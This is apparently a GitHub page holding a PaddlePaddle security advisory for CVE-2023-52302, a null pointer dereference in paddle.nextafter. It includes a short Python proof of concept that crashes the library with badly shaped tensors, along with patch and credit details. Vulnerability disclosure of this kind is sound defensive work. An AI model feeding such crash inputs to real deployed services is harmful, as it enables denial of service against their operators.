Skip to content

Latest commit

 

History

History
32 lines (20 loc) · 958 Bytes

pdsa-2023-011.md

File metadata and controls

32 lines (20 loc) · 958 Bytes

PDSA-2023-011: Null pointer dereference in paddle.nextafter

CVE Number

CVE-2023-52302

Impact

Null pointer dereference in paddle.nextafter when tensor dims are invalid . The PoC is as follows:

import paddle
import numpy as np

paddle.nextafter(
    x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 2]).astype(np.float32)),
    y=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 0, 0, 0]).astype(np.float32))
)

Patches

We have patched the issue in commit 19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc. The fix will be included in PaddlePaddle 2.6.0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Tong Liu of CAS-IIE.